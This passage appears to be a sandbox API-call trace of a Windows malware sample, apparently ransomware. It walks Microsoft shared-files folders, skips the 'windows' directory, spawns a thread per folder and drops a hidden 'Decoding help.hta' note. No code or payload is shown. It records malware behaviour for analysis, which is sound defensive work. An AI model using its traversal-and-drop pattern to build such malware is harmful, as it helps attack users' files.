nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1036", cAlternateFileName="")) returned 1 [0048.659] lstrcmpW (lpString1=".", lpString2="1036") returned -1 [0048.660] lstrcmpW (lpString1="..", lpString2="1036") returned -1 [0048.660] lstrcmpiW (lpString1="windows", lpString2="1036") returned 1 [0048.662] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*" [0048.662] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*") returned 65 [0048.662] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\", lpString2="1036" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036" [0048.662] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\*.*" [0048.662] GlobalMemoryStatus (in: lpBuffer=0x14d1fd10 | out: lpBuffer=0x14d1fd10) [0048.662] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x247a5748, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x308 [0048.665] CloseHandle (hObject=0x308) returned 1 [0048.665] FindNextFileW (in: hFindFile=0x5e2fb0, lpFindFileData=0x14d1fd30 | out: lpFindFileData=0x14d1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed84810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed84810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed84810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1040", cAlternateFileName="")) returned 1 [0048.665] lstrcmpW (lpString1=".", lpString2="1040") returned -1 [0048.665] lstrcmpW (lpString1="..", lpString2="1040") returned -1 [0048.666] lstrcmpiW (lpString1="windows", lpString2="1040") returned 1 [0048.668] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*" [0048.668] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*") returned 65 [0048.668] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\", lpString2="1040" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040" [0048.668] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\*.*" [0048.668] GlobalMemoryStatus (in: lpBuffer=0x14d1fd10 | out: lpBuffer=0x14d1fd10) [0048.668] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x247bd7b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x308 [0048.675] CloseHandle (hObject=0x308) returned 1 [0048.675] FindNextFileW (in: hFindFile=0x5e2fb0, lpFindFileData=0x14d1fd30 | out: lpFindFileData=0x14d1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed84810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1041", cAlternateFileName="")) returned 1 [0048.675] lstrcmpW (lpString1=".", lpString2="1041") returned -1 [0048.675] lstrcmpW (lpString1="..", lpString2="1041") returned -1 [0048.675] lstrcmpiW (lpString1="windows", lpString2="1041") returned 1 [0048.677] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*" [0048.677] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*") returned 65 [0048.677] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\", lpString2="1041" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041" [0048.678] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\*.*" [0048.678] GlobalMemoryStatus (in: lpBuffer=0x14d1fd10 | out: lpBuffer=0x14d1fd10) [0048.678] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x247ed880, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x308 [0048.682] CloseHandle (hObject=0x308) returned 1 [0048.682] FindNextFileW (in: hFindFile=0x5e2fb0, lpFindFileData=0x14d1fd30 | out: lpFindFileData=0x14d1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1042", cAlternateFileName="")) returned 1 [0048.682] lstrcmpW (lpString1=".", lpString2="1042") returned -1 [0048.683] lstrcmpW (lpString1="..", lpString2="1042") returned -1 [0048.683] lstrcmpiW (lpString1="windows", lpString2="1042") returned 1 [0048.685] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*" [0048.685] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*") returned 65 [0048.685] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\", lpString2="1042" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042" [0048.685] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\*.*" [0048.685] GlobalMemoryStatus (in: lpBuffer=0x14d1fd10 | out: lpBuffer=0x14d1fd10) [0048.685] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x248058e8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x308 [0048.693] CloseHandle (hObject=0x308) returned 1 [0048.693] FindNextFileW (in: hFindFile=0x5e2fb0, lpFindFileData=0x14d1fd30 | out: lpFindFileData=0x14d1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1046", cAlternateFileName="")) returned 1 [0048.693] lstrcmpW (lpString1=".", lpString2="1046") returned -1 [0048.693] lstrcmpW (lpString1="..", lpString2="1046") returned -1 [0048.693] lstrcmpiW (lpString1="windows", lpString2="1046") returned 1 [0048.696] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*" [0048.696] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*") returned 65 [0048.696] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\", lpString2="1046" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046" [0048.696] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\*.*" [0048.696] GlobalMemoryStatus (in: lpBuffer=0x14d1fd10 | out: lpBuffer=0x14d1fd10) [0048.696] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x248359b8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x308 [0048.699] CloseHandle (hObject=0x308) returned 1 [0048.700] FindNextFileW (in: hFindFile=0x5e2fb0, lpFindFileData=0x14d1fd30 | out: lpFindFileData=0x14d1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1049", cAlternateFileName="")) returned 1 [0048.700] lstrcmpW (lpString1=".", lpString2="1049") returned -1 [0048.700] lstrcmpW (lpString1="..", lpString2="1049") returned -1 [0048.700] lstrcmpiW (lpString1="windows", lpString2="1049") returned 1 [0048.702] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*" [0048.702] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*") returned 65 [0048.702] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\", lpString2="1049" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049" [0048.702] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\*.*" [0048.702] GlobalMemoryStatus (in: lpBuffer=0x14d1fd10 | out: lpBuffer=0x14d1fd10) [0048.702] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2484da20, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x308 [0049.466] CloseHandle (hObject=0x308) returned 1 [0049.466] FindNextFileW (in: hFindFile=0x5e2fb0, lpFindFileData=0x14d1fd30 | out: lpFindFileData=0x14d1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed5e6b0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed5e6b0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2052", cAlternateFileName="")) returned 1 [0049.466] lstrcmpW (lpString1=".", lpString2="2052") returned -1 [0049.466] lstrcmpW (lpString1="..", lpString2="2052") returned -1 [0049.466] lstrcmpiW (lpString1="windows", lpString2="2052") returned 1 [0049.678] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*" [0049.678] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*") returned 65 [0049.678] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\", lpString2="2052" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052" [0049.678] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\*.*" [0049.678] GlobalMemoryStatus (in: lpBuffer=0x14d1fd10 | out: lpBuffer=0x14d1fd10) [0049.678] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24e6eda0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x38c [0049.692] CloseHandle (hObject=0x38c) returned 1 [0049.692] FindNextFileW (in: hFindFile=0x5e2fb0, lpFindFileData=0x14d1fd30 | out: lpFindFileData=0x14d1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed84810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed84810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed84810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3082", cAlternateFileName="")) returned 1 [0049.692] lstrcmpW (lpString1=".", lpString2="3082") returned -1 [0049.692] lstrcmpW (lpString1="..", lpString2="3082") returned -1 [0049.692] lstrcmpiW (lpString1="windows", lpString2="3082") returned 1 [0050.068] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*" [0050.068] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*") returned 65 [0050.068] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\", lpString2="3082" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082" [0050.068] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\*.*" [0050.068] GlobalMemoryStatus (in: lpBuffer=0x14d1fd10 | out: lpBuffer=0x14d1fd10) [0050.068] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24ee6fa8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x498 [0050.079] CloseHandle (hObject=0x498) returned 1 [0050.079] FindNextFileW (in: hFindFile=0x5e2fb0, lpFindFileData=0x14d1fd30 | out: lpFindFileData=0x14d1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93aa2500, ftCreationTime.dwHighDateTime=0x1c9db14, ftLastAccessTime.dwLowDateTime=0x522dc930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x93aa2500, ftLastWriteTime.dwHighDateTime=0x1c9db14, nFileSizeHigh=0x0, nFileSizeLow=0x323, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hx.HxC", cAlternateFileName="")) returned 1 [0050.079] lstrcpyW (in: lpString1=0x24f47148, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*" [0050.079] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*") returned 65 [0050.079] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\Decoding help.hta" [0050.079] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\decoding help.hta")) returned 0xffffffff [0050.079] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0054.027] WriteFile (in: hFile=0x43c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x14d1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x14d1fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0056.109] CloseHandle (hObject=0x43c) returned 1 [0056.266] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 301 os_tid = 0x110 [0042.454] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*", lpFindFileData=0x14e5fd30 | out: lpFindFileData=0x14e5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xa21d9876, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa21d9876, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671530 [0042.510] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.510] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x14e5fd30 | out: lpFindFileData=0x14e5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xa21d9876, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa21d9876, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.510] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.510] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.510] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x14e5fd30 | out: lpFindFileData=0x14e5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x81305af3, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x81305af3, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0", cAlternateFileName="")) returned 1 [0042.510] lstrcmpW (lpString1=".", lpString2="1.0") returned -1 [0042.510] lstrcmpW (lpString1="..", lpString2="1.0") returned -1 [0042.510] lstrcmpiW (lpString1="windows", lpString2="1.0") returned 1 [0042.651] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.651] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.651] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="1.0" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0" [0042.651] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0\\*.*" [0042.651] GlobalMemoryStatus (in: lpBuffer=0x14e5fd10 | out: lpBuffer=0x14e5fd10) [0042.651] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x115493f8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x668 [0042.668] CloseHandle (hObject=0x668) returned 1 [0042.668] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x14e5fd30 | out: lpFindFileData=0x14e5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x81305af3, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x81305af3, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.7", cAlternateFileName="")) returned 1 [0042.668] lstrcmpW (lpString1=".", lpString2="1.7") returned -1 [0042.668] lstrcmpW (lpString1="..", lpString2="1.7") returned -1 [0042.668] lstrcmpiW (lpString1="windows", lpString2="1.7") returned 1 [0042.670] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.670] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.670] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="1.7" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7" [0042.670] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7\\*.*" [0042.670] GlobalMemoryStatus (in: lpBuffer=0x14e5fd10 | out: lpBuffer=0x14e5fd10) [0042.670] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x115794c8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x668 [0042.678] CloseHandle (hObject=0x668) returned 1 [0042.678] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x14e5fd30 | out: lpFindFileData=0x14e5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xa21b3607, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa21b3607, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0042.678] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0042.678] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0042.678] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0042.681] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.681] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.681] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US" [0042.681] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*.*" [0042.681] GlobalMemoryStatus (in: lpBuffer=0x14e5fd10 | out: lpBuffer=0x14e5fd10) [0042.681] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x115c1600, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x668 [0042.684] CloseHandle (hObject=0x668) returned 1 [0042.684] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x14e5fd30 | out: lpFindFileData=0x14e5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa21d9876, 